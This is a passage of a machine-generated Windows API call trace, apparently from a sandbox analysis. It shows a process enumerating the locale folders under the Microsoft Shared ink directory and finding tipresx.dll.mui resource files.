ftCreationTime.dwLowDateTime=0xe4bbb926, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe4dd0c3c, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe4dd0c3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0046.478] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.478] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.479] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.479] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO", lpFilePart=0x0) returned 0x38 [0046.479] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.479] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.479] CoTaskMemFree (pv=0x4fe370) [0046.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.479] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO", lpFilePart=0x0) returned 0x38 [0046.479] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.479] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO", lpFilePart=0x0) returned 0x38 [0046.479] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\", lpFilePart=0x0) returned 0x39 [0046.479] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.480] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.480] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe215549d, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe2390910, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe2390910, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.480] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.480] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.480] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.480] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.480] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\tipresx.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\tipresx.dll.mui", lpFilePart=0x0) returned 0x48 [0046.480] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.480] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO", lpFilePart=0x0) returned 0x38 [0046.480] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\", lpFilePart=0x0) returned 0x39 [0046.480] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.481] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.481] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe215549d, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe2390910, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe2390910, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.481] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe215549d, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe2390910, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe2390910, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0046.481] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.481] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.481] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.481] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU", lpFilePart=0x0) returned 0x38 [0046.481] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.481] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.481] CoTaskMemFree (pv=0x4fe370) [0046.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.482] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU", lpFilePart=0x0) returned 0x38 [0046.482] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.482] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU", lpFilePart=0x0) returned 0x38 [0046.482] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\", lpFilePart=0x0) returned 0x39 [0046.482] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.488] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.488] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea6a1a1d, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xea8dce90, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xea902fed, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.488] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.488] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.488] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\tipresx.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\tipresx.dll.mui", lpFilePart=0x0) returned 0x48 [0046.488] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.488] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU", lpFilePart=0x0) returned 0x38 [0046.488] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\", lpFilePart=0x0) returned 0x39 [0046.489] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.489] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.489] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea6a1a1d, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xea8dce90, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xea902fed, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.489] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea6a1a1d, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xea8dce90, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xea902fed, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0046.489] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.489] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.489] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.489] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK", lpFilePart=0x0) returned 0x38 [0046.489] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.489] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.489] CoTaskMemFree (pv=0x4fe370) [0046.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.490] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK", lpFilePart=0x0) returned 0x38 [0046.490] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.490] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK", lpFilePart=0x0) returned 0x38 [0046.490] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\", lpFilePart=0x0) returned 0x39 [0046.490] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.490] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.490] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe526d67f, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe54f4dac, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe54f4dac, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.490] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.491] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.491] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\tipresx.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\tipresx.dll.mui", lpFilePart=0x0) returned 0x48 [0046.491] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.491] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK", lpFilePart=0x0) returned 0x38 [0046.491] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\", lpFilePart=0x0) returned 0x39 [0046.491] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.491] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.491] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe526d67f, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe54f4dac, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe54f4dac, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.491] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe526d67f, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe54f4dac, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe54f4dac, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0046.492] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.492] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.492] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.492] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI", lpFilePart=0x0) returned 0x38 [0046.492] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.492] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.492] CoTaskMemFree (pv=0x4fe370) [0046.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.492] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI", lpFilePart=0x0) returned 0x38 [0046.492] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.492] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI", lpFilePart=0x0) returned 0x38 [0046.492] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\", lpFilePart=0x0) returned 0x39 [0046.492] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.493] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.493] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, 